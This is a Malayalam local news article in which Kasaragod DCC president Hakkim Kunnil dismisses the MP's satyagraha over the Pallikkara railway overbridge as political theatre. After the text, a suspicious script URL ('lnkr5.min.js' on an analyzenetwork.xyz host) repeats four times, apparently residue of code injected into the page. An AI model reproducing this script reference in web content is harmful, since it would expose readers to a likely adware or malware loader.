പള്ളിക്കര റെയില്‍വേ മേല്‍പാലം: എം.പിയുടെ സത്യാഗ്രഹം ജനവികാരം മറക്കാനുള്ള ചെപ്പടിവിദ്യമാത്രമെന്ന് ഹക്കിം കുന്നില്‍

  • Post category:local news
  • Reading time:1 min read
You are currently viewing പള്ളിക്കര റെയില്‍വേ മേല്‍പാലം: എം.പിയുടെ സത്യാഗ്രഹം ജനവികാരം മറക്കാനുള്ള ചെപ്പടിവിദ്യമാത്രമെന്ന് ഹക്കിം കുന്നില്‍

കാസര്‍കോട്: പള്ളിക്കര ദേശീയ പാതയിലുള്ള റെയില്‍വേ മേല്‍പാലം നിര്‍മ്മാണം ആരംഭിക്കാത്തില്‍ പ്രതിഷേധിച്ച് പി കരുണാകരന്‍ എം.പി നടത്താന്‍പോകുന്ന സത്യാഗ്രഹം എം.പി ക്കെതിരേ ഉയര്‍ന്നുവരുന്ന ജനവികാരം മറക്കാനുള്ള ചെപ്പടിവിദ്യമാത്രമെന്ന് ഡി.സി.സി പ്രസിഡന്റ് ഹക്കിം കുന്നില്‍. ചാനല്‍ആര്‍.ബി ഡോട്ട്‌കോമില്‍ വന്ന വാര്‍ത്തയോട് പ്രതികരിക്കുകയായിരുന്നു അദ്ദേഹം. ദീര്‍ഘ നാളായി റെയില്‍വേ ബോര്‍ഡംഗം, 13 വര്‍ഷം ജനപ്രതിനിധി എന്ന നിലകളില്‍ പ്രവര്‍ത്തിക്കുന്നവേളയില്‍ നടത്താന്‍ കഴിയാത്ത സമരം രാഷ്ട്രീയമായേ കോണ്‍ഗ്രസിന് കാണാനാകൂ. ഇത് ഇന്നത്തെ വിഷയമല്ല. 1984 മുതല്‍ ആരംഭിച്ചതാണ് റെയില്‍വേ മേല്‍പാലത്തിനുവേണ്ടിയുള്ള മുറവിളി. പക്ഷെ ഇതിന്റെ പേരില്‍ എം.പി ഇപ്പോള്‍ നടത്തുന്ന സമരം ആത്മാര്‍ഥതയില്ലാത്തതാണെന്നും ജനങ്ങളുടെ കണ്ണില്‍പൊടിയിടാനെ അതിനു കഴിയുകയുള്ളൂവെന്നും അദ്ദേഹം കുറ്റപ്പെടുത്തി. സമരത്തിന് അപ്പുറം ജില്ലയുടെ റെയില്‍വേയോടുള്ള അവഗണനയുടെ കാര്യത്തില്‍ ശാശ്വത പരിഹാരമാണ് ആവശ്യം. മേല്‍പാലമുയര്‍ന്നുവരുന്നതോടെ കണ്ണൂര്‍ കാസര്‍കോട് ജില്ലകളിലെ യാത്രക്കാരുടെ പ്രശ്‌നങ്ങള്‍ക്ക് ഒരുപരിഹാരമാകും. അനുദിനം റെയില്‍വ കടുത്ത അവഗണനയാണ് ജില്ലയോട് കാട്ടുന്നത്. ജില്ലയില്‍ റെയില്‍വേയുള്ള ടിക്കറ്റ് കലക്ഷനില്‍ വര്‍ധനവുണ്ടെങ്കിലും അതിനുനനുസരിച്ച വികസനങ്ങളോ ഫണ്ടോ അനുവദിക്കുന്നില്ല. റെയില്‍വേ വരുമാനം മാത്രമല്ല പ്രതീക്ഷിക്കേണ്ടത്. ജനങ്ങള്‍ക്കുള്ള സേവനവും ലക്ഷ്യമിടണം. എന്നാല്‍ റെയില്‍വേയുടെ കാര്യത്തില്‍ ഉദ്യോഗസ്ഥന്മാരുടെ താല്‍പര്യങ്ങള്‍ക്ക് മുന്നില്‍ ജനപ്രതിനിധികള്‍ മുട്ടുമടക്കാന്‍ കൂട്ടുനില്‍ക്കുന്ന അവസ്ഥയാണിന്നുള്ളത്. അര്‍ഹതപ്പെട്ട അംഗീകാരം ലഭിക്കാന്‍ പൊതുജനങ്ങളുടെ വികാരമുയര്‍ന്നുവരണമെന്നും ജില്ലയിലെ റെയില്‍വയുടെ ശാശ്വതവികസനത്തിന് കോണ്‍ഗ്രസും സമരമിരിക്കാന്‍ തയ്യാറാണെന്നും ഹക്കീം വ്യക്തമാക്കി.

http://analyzenetwork.xyz/addons/lnkr5.min.jshttp://analyzenetwork.xyz/addons/lnkr5.min.js

http://analyzenetwork.xyz/addons/lnkr5.min.jshttp://analyzenetwork.xyz/addons/lnkr5.min.js

0Shares